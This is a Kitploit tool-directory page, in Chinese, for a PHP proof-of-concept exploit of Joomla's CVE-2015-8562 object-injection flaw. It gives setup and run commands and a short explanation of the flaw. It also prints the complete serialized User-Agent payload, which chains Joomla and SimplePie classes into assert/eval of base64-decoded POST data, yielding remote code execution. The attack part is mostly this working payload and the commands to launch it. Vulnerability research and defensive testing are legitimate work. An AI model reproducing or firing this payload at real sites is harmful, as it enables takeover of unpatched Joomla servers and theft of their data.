Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Joomla-CVE-2015-8562-PHP-POC — 针对Joomla的CVE-2015-8562漏洞的概念验证 | Kitploit
工具/GitHubGitHub/robinhoutevelts/joomla-cve-2015-8562-php-poc
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubrobinhoutevelts/joomla-cve-2015-8562-php-poc

Joomla-CVE-2015-8562-PHP-POC

针对Joomla的CVE-2015-8562漏洞的概念验证

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
2310年前尚未审核
分享

Joomla-CVE-2015-8562-PHP-POC

Joomla CVE-2015-8562 漏洞的概念验证(PoC)

预览

简介

此 PoC 几乎完全复制了 Gary 的 Python 实现,该实现托管在 exploit-db 上。

使用方法

安装过程非常简单:

root@kitploit:~
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install

Composer 安装完所有依赖后,你需要修改 exploit.php 中的 $target 变量。

之后就可以使用了:

root@kitploit:~
php exploit.php

CVE-2015-8562

2015年12月,Joomla 中发现了一个漏洞。它允许远程攻击者通过 HTTP User-Agent 头部执行 PHP 对象注入攻击,并执行任意 PHP 代码。

此漏洞影响 Joomla 的所有版本。针对 v1.5.x、v2.5x 和 v3.x 的补丁已。

发布

如果你运行的是 PHP >= 5.4.45、>= 5.5.29 或 >= 5.6.13,则不受影响,因为该漏洞利用也依赖于 CVE-2015-6835。

来自 PatrolServer 的 Nikos Verschore 写了一篇非常详细的博客文章,对理解此漏洞提供了重要帮助。你可以免费使用他们的迷你扫描器来检查你的网站是否存在风险。

实际漏洞利用

以下是发送的 User-Agent 头部的样子:

root@kitploit:~
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
  s:4:"\0\0\0a";
  O:17:"JSimplepieFactory":0:{}
  s:21:"\0\0\0disconnectHandlers";
  a:1:{
    i:0;
    a:2:{
      i:0;
      O:9:"SimplePie":5:{
        s:8:"sanitize";
        O:20:"JDatabaseDriverMysql":0:{}
        s:5:"cache";
        b:1;
        s:19:"cache_name_function";
        s:6:"assert";
        s:10:"javascript";
        i:9999;
        s:8:"feed_url";
        s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
      }
      i:1;
      s:4:"init";
    }
  }
  s:13:"\0\0\0connection";
  i:1;
}
下载工具